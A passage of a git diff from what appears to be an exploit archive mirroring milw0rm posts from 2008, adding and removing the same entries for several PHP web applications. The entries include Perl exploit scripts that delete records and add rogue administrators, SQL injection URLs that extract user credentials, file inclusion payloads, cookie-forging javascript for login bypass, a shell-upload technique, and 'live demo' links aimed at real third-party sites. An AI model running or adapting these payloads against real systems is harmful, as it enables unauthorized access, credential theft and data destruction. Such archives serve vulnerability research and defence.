-# milw0rm.com [2004-11-21]
+};
+
+# milw0rm.com [2004-11-21]
diff --git a/platforms/php/webapps/6450.pl b/platforms/php/webapps/6450.pl
index 2b2a5e68c..8c3f9b48c 100755
--- a/platforms/php/webapps/6450.pl
+++ b/platforms/php/webapps/6450.pl
@@ -1,56 +1,56 @@
-#!/usr/bin/perl -W
-
-# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
-# File affected: include/draw-delete.php (id)
-
-# Vuln Code:
-
-# 06:  $did = $_GET['id'];
-# 08:  mysql_query("DELETE FROM draw WHERE did='$did'");
-
-# by ka0x 
-# D.O.M Labs - Security Researchers
-# - www.domlabs.org -
-#
-
-# ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
-
-
-use LWP::UserAgent;
-
-my $host = $ARGV[0];
-my $did = $ARGV[1];
-
-die &_USAGE unless $ARGV[1];
-
-sub _USAGE
-{
-	die "
-	- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
-	- by ka0x (www.domlabs.org)
-	
-	usage: ./$0  
-	ex: ./$0 http://localhost/sportspanel 2
-	";
-}
-
-my $ua = LWP::UserAgent->new() or die;
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
-
-my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
-my $res = $ua->request($req);
-my $con = $res->content;
-
-if ($res->is_success){
-	if($con =~ /$did/){
-		print "[+] The Game \"$did\" has been deleted from the database!\n";
-	}
-}
-
-else{
-	print "[-] Exploit Failed!";
-}
-
-__END__
-
-# milw0rm.com [2008-09-13]
+#!/usr/bin/perl -W
+
+# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
+# File affected: include/draw-delete.php (id)
+
+# Vuln Code:
+
+# 06:  $did = $_GET['id'];
+# 08:  mysql_query("DELETE FROM draw WHERE did='$did'");
+
+# by ka0x 
+# D.O.M Labs - Security Researchers
+# - www.domlabs.org -
+#
+
+# ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
+
+
+use LWP::UserAgent;
+
+my $host = $ARGV[0];
+my $did = $ARGV[1];
+
+die &_USAGE unless $ARGV[1];
+
+sub _USAGE
+{
+	die "
+	- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
+	- by ka0x (www.domlabs.org)
+	
+	usage: ./$0  
+	ex: ./$0 http://localhost/sportspanel 2
+	";
+}
+
+my $ua = LWP::UserAgent->new() or die;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
+
+my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
+my $res = $ua->request($req);
+my $con = $res->content;
+
+if ($res->is_success){
+	if($con =~ /$did/){
+		print "[+] The Game \"$did\" has been deleted from the database!\n";
+	}
+}
+
+else{
+	print "[-] Exploit Failed!";
+}
+
+__END__
+
+# milw0rm.com [2008-09-13]
diff --git a/platforms/php/webapps/6451.txt b/platforms/php/webapps/6451.txt
index 68f702087..f50f517c4 100755
--- a/platforms/php/webapps/6451.txt
+++ b/platforms/php/webapps/6451.txt
@@ -1,44 +1,44 @@
-############################################################################################################
-[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure
-[+] Discovered By SirGod 
-[+] MorTal TeaM                     
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                     
-############################################################################################################
-
- [+] Local File Inclusion
-
-
-   PoC 1 :
-
-     http://[target]/[path]/comments.php?language=[Local File]%00
-
-   Example 1 :
-  
-     http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00
-
-
-   PoC 2 :
-
-     http://[target]/[path]/install/help.php?language=[Local File]%00
-
-   Example 2 :
-
-     http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00
-
-
-
- [+] PHPInfo Disclosure
-
-
-   PoC:
-
-     http://[target]/[path]/install/info.php
-
-   Example :
-
-     http://127.0.0.1/talkback/install/info.php
-
-
-##############################################################################################################
-
-# milw0rm.com [2008-09-13]
+############################################################################################################
+[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure
+[+] Discovered By SirGod 
+[+] MorTal TeaM                     
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                     
+############################################################################################################
+
+ [+] Local File Inclusion
+
+
+   PoC 1 :
+
+     http://[target]/[path]/comments.php?language=[Local File]%00
+
+   Example 1 :
+  
+     http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00
+
+
+   PoC 2 :
+
+     http://[target]/[path]/install/help.php?language=[Local File]%00
+
+   Example 2 :
+
+     http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00
+
+
+
+ [+] PHPInfo Disclosure
+
+
+   PoC:
+
+     http://[target]/[path]/install/info.php
+
+   Example :
+
+     http://127.0.0.1/talkback/install/info.php
+
+
+##############################################################################################################
+
+# milw0rm.com [2008-09-13]
diff --git a/platforms/php/webapps/6452.txt b/platforms/php/webapps/6452.txt
index 359760097..047822c01 100755
--- a/platforms/php/webapps/6452.txt
+++ b/platforms/php/webapps/6452.txt
@@ -1,13 +1,13 @@
- fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln
- 
-Download : http://sourceforge.net/projects/phpsmartcom/
- 
-Local File Inclusion:
-http://127.0.0.1/phpsmartcom/index.php?p=../../../../../boot.ini%00
- 
-SQL Injection:
-http://localhost/phpsmartcom/index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1/*
- 
-Credits : Neo , R3dm0v3
-
-# milw0rm.com [2008-09-13]
+ fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln
+ 
+Download : http://sourceforge.net/projects/phpsmartcom/
+ 
+Local File Inclusion:
+http://127.0.0.1/phpsmartcom/index.php?p=../../../../../boot.ini%00
+ 
+SQL Injection:
+http://localhost/phpsmartcom/index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1/*
+ 
+Credits : Neo , R3dm0v3
+
+# milw0rm.com [2008-09-13]
diff --git a/platforms/php/webapps/6455.txt b/platforms/php/webapps/6455.txt
index 0590bb7fa..6d135581b 100755
--- a/platforms/php/webapps/6455.txt
+++ b/platforms/php/webapps/6455.txt
@@ -1,26 +1,26 @@
-================================================================================
-  Linkarity (link.php) Remote SQL Injection Vulnerability   
-================================================================================
-
-
-
-Discovered By: Egypt Coder
-
-home : WWW.Sec-Area.com
-
-Mail: Egyptcoder@hotmail.com
-
-
-
-Dork:  Powered by: Linkarityâ„¢
-
-
-Exploit :
-
-http://localhost/link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18
-
-
-
-Greets : ProViDoR , rUnViruS, Error Code, H666p , Fear Master , Broken Security
-
-# milw0rm.com [2008-09-13]
+================================================================================
+  Linkarity (link.php) Remote SQL Injection Vulnerability   
+================================================================================
+
+
+
+Discovered By: Egypt Coder
+
+home : WWW.Sec-Area.com
+
+Mail: Egyptcoder@hotmail.com
+
+
+
+Dork:  Powered by: Linkarityâ„¢
+
+
+Exploit :
+
+http://localhost/link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18
+
+
+
+Greets : ProViDoR , rUnViruS, Error Code, H666p , Fear Master , Broken Security
+
+# milw0rm.com [2008-09-13]
diff --git a/platforms/php/webapps/6456.txt b/platforms/php/webapps/6456.txt
index 853445006..8101dc127 100755
--- a/platforms/php/webapps/6456.txt
+++ b/platforms/php/webapps/6456.txt
@@ -1,30 +1,30 @@
-###############################################################################################
-[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
-[+] Discovered By SirGod 
-[+] wWw.MorTal-TeaM.OrG                   
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                    
-################################################################################################
-
- [+] Arbitrary Backup Database
-
-  Follow the example and the database download will begin :
-
-   [dbname]_db_backup.sql
-
- 
-  PoC :
-
-    http://[target]/[path]/admin/backupdb.php
-
-  Example :
-
-    http://127.0.0.1/book/admin/backupdb.php
-
-  Live Demo :
-
-    http://phpversion.com/book/admin/backupdb.php
-
-
-################################################################################################
-
-# milw0rm.com [2008-09-13]
+###############################################################################################
+[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
+[+] Discovered By SirGod 
+[+] wWw.MorTal-TeaM.OrG                   
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                    
+################################################################################################
+
+ [+] Arbitrary Backup Database
+
+  Follow the example and the database download will begin :
+
+   [dbname]_db_backup.sql
+
+ 
+  PoC :
+
+    http://[target]/[path]/admin/backupdb.php
+
+  Example :
+
+    http://127.0.0.1/book/admin/backupdb.php
+
+  Live Demo :
+
+    http://phpversion.com/book/admin/backupdb.php
+
+
+################################################################################################
+
+# milw0rm.com [2008-09-13]
diff --git a/platforms/php/webapps/6457.txt b/platforms/php/webapps/6457.txt
index 04b75e0ee..6485c6b7b 100755
--- a/platforms/php/webapps/6457.txt
+++ b/platforms/php/webapps/6457.txt
@@ -1,10 +1,10 @@
-###############################################################################################
-[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
-[+] Discovered By Stack                 
-[+] Greetz : All my freind                
-################################################################################################
----
-exploit:
-javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";
-
-# milw0rm.com [2008-09-14]
+###############################################################################################
+[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
+[+] Discovered By Stack                 
+[+] Greetz : All my freind                
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";
+
+# milw0rm.com [2008-09-14]
diff --git a/platforms/php/webapps/6460.txt b/platforms/php/webapps/6460.txt
index b314517e0..d2c834cd9 100755
--- a/platforms/php/webapps/6460.txt
+++ b/platforms/php/webapps/6460.txt
@@ -1,22 +1,22 @@
-Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection
-
-Author: ~!Dok_tOR!~
-Date found: 13.09.08
-Product: Kasseler CMS
-Version: 1.1.0, 1.2.4
-URL: www.kasseler-cms.net
-Vulnerability Class: SQL Injection
-
-http://localhost/[installdir]/index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1/*
-
-http://localhost/[installdir]/index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1/*
-
-http://localhost/[installdir]/index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1/*
-
-http://localhost/[installdir]/index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1/*
-
-http://localhost/[installdir]/index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1/*
-
-http://localhost/[installdir]/index.php?module=TopSites+1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1/*
-
-# milw0rm.com [2008-09-14]
+Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection
+
+Author: ~!Dok_tOR!~
+Date found: 13.09.08
+Product: Kasseler CMS
+Version: 1.1.0, 1.2.4
+URL: www.kasseler-cms.net
+Vulnerability Class: SQL Injection
+
+http://localhost/[installdir]/index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1/*
+
+http://localhost/[installdir]/index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1/*
+
+http://localhost/[installdir]/index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1/*
+
+http://localhost/[installdir]/index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1/*
+
+http://localhost/[installdir]/index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1/*
+
+http://localhost/[installdir]/index.php?module=TopSites+1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1/*
+
+# milw0rm.com [2008-09-14]
diff --git a/platforms/php/webapps/6461.txt b/platforms/php/webapps/6461.txt
index 3c5067740..af016007c 100755
--- a/platforms/php/webapps/6461.txt
+++ b/platforms/php/webapps/6461.txt
@@ -1,52 +1,52 @@
-##############################################################
-Fantastico In all Version Cpanel 11.x <= local File Include
-
-##############################################################
-
-
-Must login to  :2082
-To break the protection   mod_security  & safe_mode: off  & Disable functions :  all none
-
- 
-
-Vulnerable Code
-
-$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";
-if (is_file($licensing_servers))
-       {
-       include($licensing_servers);
-
-
-in
-
-http://xx.com:2082/frontend/x/fantastico/includes/xml.php
-
-
-Exploit >>
-
-First Create directory Let the name  /includes/ and upload Shell.php  in  /includes/  Then  rename it to enc_licensing_servers.php
-
-
-:::xploit::::
-
-http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user
-
- 
-
-###################################################
-
-Discoverd By : joker_1
-
- 
-
-for info : pl57@msn.com
-
- 
-
-###################################################
-
-Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star
-
-###################################################
-
-# milw0rm.com [2008-09-14]
+##############################################################
+Fantastico In all Version Cpanel 11.x <= local File Include
+
+##############################################################
+
+
+Must login to  :2082
+To break the protection   mod_security  & safe_mode: off  & Disable functions :  all none
+
+ 
+
+Vulnerable Code
+
+$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";
+if (is_file($licensing_servers))
+       {
+       include($licensing_servers);
+
+
+in
+
+http://xx.com:2082/frontend/x/fantastico/includes/xml.php
+
+
+Exploit >>
+
+First Create directory Let the name  /includes/ and upload Shell.php  in  /includes/  Then  rename it to enc_licensing_servers.php
+
+
+:::xploit::::
+
+http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user
+
+ 
+
+###################################################
+
+Discoverd By : joker_1
+
+ 
+
+for info : pl57@msn.com
+
+ 
+
+###################################################
+
+Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star
+
+###################################################
+
+# milw0rm.com [2008-09-14]
diff --git a/platforms/php/webapps/6462.pl b/platforms/php/webapps/6462.pl
index f8574069b..19a066f71 100755
--- a/platforms/php/webapps/6462.pl
+++ b/platforms/php/webapps/6462.pl
@@ -1,66 +1,66 @@
-#!/usr/bin/perl
-# ----------------------------------------------------------
-# CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit
-# Perl Exploit - Add a new admin with your credentials!
-# Discovered On: 15/09/2008
-# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
-# ----------------------------------------------------------
-# Usage: perl http://localhost/cms StAkeR obscure
-# ----------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my $email = 'some@example.net';
-my ($hostname,$username,$password) = @ARGV;
-my $request  = undef;
-my $http_s   = new LWP::UserAgent or die $!;
-
-$hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
-banner() unless $username and $password;
-
-$http_s->agent("Mozilla/4.5 [en] (Win95; U)");
-$http_s->timeout(1);
-$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1");           
-
-$request = $http_s->post($hostname."/cn_users.php",
-                         [
-                          user    => $username,
-                          pass    => $password,
-                          email   => $email,
-                          allcats => "all",
-                          admin   => "off",
-                          news    => "on",
-                          images  => "on",
-                          users   => "on",
-                          categories => "on",
-                          config  => "on",
-                          words  => "on",
-                          op => "add",
-                          id => '',
-                          go  => "true",
-                          submit => "Add+User"
-                        ]);
-        
-if($request->is_success)
-{
-  if($request->content =~ /has been added/i)
-  {
-    print "[+] Added New Administrator: $username & $password\n";
-  }
-  else
-  {
-    print "[!] Exploit Failed!\n";
-    print "[!] Site Not Vulnerable\n";
-  }
-}
-
-
-sub banner
-{
-  print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n";
-  print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
-  return exit;
-}
-
-# milw0rm.com [2008-09-15]
+#!/usr/bin/perl
+# ----------------------------------------------------------
+# CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit
+# Perl Exploit - Add a new admin with your credentials!
+# Discovered On: 15/09/2008
+# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
+# ----------------------------------------------------------
+# Usage: perl http://localhost/cms StAkeR obscure
+# ----------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my $email = 'some@example.net';
+my ($hostname,$username,$password) = @ARGV;
+my $request  = undef;
+my $http_s   = new LWP::UserAgent or die $!;
+
+$hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
+banner() unless $username and $password;
+
+$http_s->agent("Mozilla/4.5 [en] (Win95; U)");
+$http_s->timeout(1);
+$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1");           
+
+$request = $http_s->post($hostname."/cn_users.php",
+                         [
+                          user    => $username,
+                          pass    => $password,
+                          email   => $email,
+                          allcats => "all",
+                          admin   => "off",
+                          news    => "on",
+                          images  => "on",
+                          users   => "on",
+                          categories => "on",
+                          config  => "on",
+                          words  => "on",
+                          op => "add",
+                          id => '',
+                          go  => "true",
+                          submit => "Add+User"
+                        ]);
+        
+if($request->is_success)
+{
+  if($request->content =~ /has been added/i)
+  {
+    print "[+] Added New Administrator: $username & $password\n";
+  }
+  else
+  {
+    print "[!] Exploit Failed!\n";
+    print "[!] Site Not Vulnerable\n";
+  }
+}
+
+
+sub banner
+{
+  print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n";
+  print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
+  return exit;
+}
+
+# milw0rm.com [2008-09-15]
diff --git a/platforms/php/webapps/6464.txt b/platforms/php/webapps/6464.txt
index 3be787f8e..a57318073 100755
--- a/platforms/php/webapps/6464.txt
+++ b/platforms/php/webapps/6464.txt
@@ -1,38 +1,38 @@
-czarNews Account Hijacking <= 1.20 user and password Leak
-----------------------------------------------------------
-
- Author: Maycon Maia Vitali ( 0ut0fBound )
-Contact: mayconmaia at yahoo dot com dot br
-         http://maycon.gsec.com.br
-
-Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 )
-
-
-Gerenal Xploit:
----------------
-
-1) Go to some page with CzarNews 1.20. You are in the 'Login Page'
-2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or
-''='";void(0);
-3) Refresh the page. Now you are logged in.
-4) Put in the URL:
-javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a
-lert("Login: " + p[0] + "\nPass: " + p[1]);void(0);
-5) With this you getted the current user and password
-
-Attacking Especific User:
--------------------------
-
-If you have some user that you need Xploit, You can change the step 2 by
-this:
-
-2) Put in the URL:
-javascript:document.cookie="recook=[USER],'+or+''='";void(0);
-
-Where [USER] need to be replaced with user name (e.g. admin)
-
-
-enjoy,
-0ut0fBound
-
-# milw0rm.com [2008-09-15]
+czarNews Account Hijacking <= 1.20 user and password Leak
+----------------------------------------------------------
+
+ Author: Maycon Maia Vitali ( 0ut0fBound )
+Contact: mayconmaia at yahoo dot com dot br
+         http://maycon.gsec.com.br
+
+Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 )
+
+
+Gerenal Xploit:
+---------------
+
+1) Go to some page with CzarNews 1.20. You are in the 'Login Page'
+2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or
+''='";void(0);
+3) Refresh the page. Now you are logged in.
+4) Put in the URL:
+javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a
+lert("Login: " + p[0] + "\nPass: " + p[1]);void(0);
+5) With this you getted the current user and password
+
+Attacking Especific User:
+-------------------------
+
+If you have some user that you need Xploit, You can change the step 2 by
+this:
+
+2) Put in the URL:
+javascript:document.cookie="recook=[USER],'+or+''='";void(0);
+
+Where [USER] need to be replaced with user name (e.g. admin)
+
+
+enjoy,
+0ut0fBound
+
+# milw0rm.com [2008-09-15]
diff --git a/platforms/php/webapps/6465.txt b/platforms/php/webapps/6465.txt
index 24f9c586d..836ab7985 100755
--- a/platforms/php/webapps/6465.txt
+++ b/platforms/php/webapps/6465.txt
@@ -1,27 +1,27 @@
-# Pre Real Estate Listings (search.php c) Remote SQL Injection Vulnerability
-# url: http://preproject.com/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: All Hackers and milw0rm website
-
-
-(SQL-way): http://www.localhost/search.php?c=(135['foo])
-
-PoC: 135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
-1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/*
-
-live demo: 
-
-http://preproject.com/ulisting/search.php?c=135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
-1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/*
-
-- In memory of rgod -
-
-# milw0rm.com [2008-09-15]
+# Pre Real Estate Listings (search.php c) Remote SQL Injection Vulnerability
+# url: http://preproject.com/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: All Hackers and milw0rm website
+
+
+(SQL-way): http://www.localhost/search.php?c=(135['foo])
+
+PoC: 135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/*
+
+live demo: 
+
+http://preproject.com/ulisting/search.php?c=135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/*
+
+- In memory of rgod -
+
+# milw0rm.com [2008-09-15]
diff --git a/platforms/php/webapps/6466.txt b/platforms/php/webapps/6466.txt
index c2161d99c..466846e15 100755
--- a/platforms/php/webapps/6466.txt
+++ b/platforms/php/webapps/6466.txt
@@ -1,41 +1,41 @@
-#################################################################################################################
-[+] Link Bid Script 1.5 Multiple Remote SQL Injection
-[+] Discovered By SirGod
-[+] wWw.MorTal-TeaM.OrG
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
-#################################################################################################################
-
-[+] Remote SQL Injection
-
-
-  - Note : For PoC 2 you need administrative rights.
-
-     PoC 1 :
-
-       http://[target]/[path]/upgrade.php?ucat=[SQL]
-
-     Example 1 :
-
-       http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all
-select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
-
-     Live Demo 1 :
-
-       http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all
-select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
-
-
------------------------------------------------------------------------------------------------------------------
-
-     PoC 2 :
-
-       http://[target]/[path]/linkadmin/edit.php?id=[SQL]
-
-     Example 2 :
-
-       http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all
-select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
-
-#################################################################################################################
-
-# milw0rm.com [2008-09-15]
+#################################################################################################################
+[+] Link Bid Script 1.5 Multiple Remote SQL Injection
+[+] Discovered By SirGod
+[+] wWw.MorTal-TeaM.OrG
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
+#################################################################################################################
+
+[+] Remote SQL Injection
+
+
+  - Note : For PoC 2 you need administrative rights.
+
+     PoC 1 :
+
+       http://[target]/[path]/upgrade.php?ucat=[SQL]
+
+     Example 1 :
+
+       http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all
+select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
+
+     Live Demo 1 :
+
+       http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all
+select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
+
+
+-----------------------------------------------------------------------------------------------------------------
+
+     PoC 2 :
+
+       http://[target]/[path]/linkadmin/edit.php?id=[SQL]
+
+     Example 2 :
+
+       http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all
+select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
+
+#################################################################################################################
+
+# milw0rm.com [2008-09-15]
diff --git a/platforms/php/webapps/6467.txt b/platforms/php/webapps/6467.txt
index 982ec0d0c..1f8556291 100755
--- a/platforms/php/webapps/6467.txt
+++ b/platforms/php/webapps/6467.txt
@@ -1,33 +1,33 @@
-#########################################################################################################################
-[+] iScripts EasyIndex (produid) Remote SQL Injection
-[+] Discovered By SirGod
-[+] wWw.MorTal-TeaM.OrG
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
-########################################################################################################################
- [+] Remote SQL Injection
-
-
-   PoC :
-
-      http://[target]/[path]/detaillist.php?produid=[SQL]
-
-
-   Example :
-
-      http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
-select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--
-
-
-   Live Demo :
-
-      http://www.dawsonvalley.net/business/detaillist.php?produid=-1
-union all select
-1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--
-
-
-   - Note : the number of colums can vary.
-
-
-##########################################################################################################################
-
-# milw0rm.com [2008-09-16]
+#########################################################################################################################
+[+] iScripts EasyIndex (produid) Remote SQL Injection
+[+] Discovered By SirGod
+[+] wWw.MorTal-TeaM.OrG
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
+########################################################################################################################
+ [+] Remote SQL Injection
+
+
+   PoC :
+
+      http://[target]/[path]/detaillist.php?produid=[SQL]
+
+
+   Example :
+
+      http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
+select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--
+
+
+   Live Demo :
+
+      http://www.dawsonvalley.net/business/detaillist.php?produid=-1
+union all select
+1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--
+
+
+   - Note : the number of colums can vary.
+
+
+##########################################################################################################################
+
+# milw0rm.com [2008-09-16]
diff --git a/platforms/php/webapps/6468.txt b/platforms/php/webapps/6468.txt
index 7d22f5ef7..707b47c6b 100755
--- a/platforms/php/webapps/6468.txt
+++ b/platforms/php/webapps/6468.txt
@@ -1,121 +1,121 @@
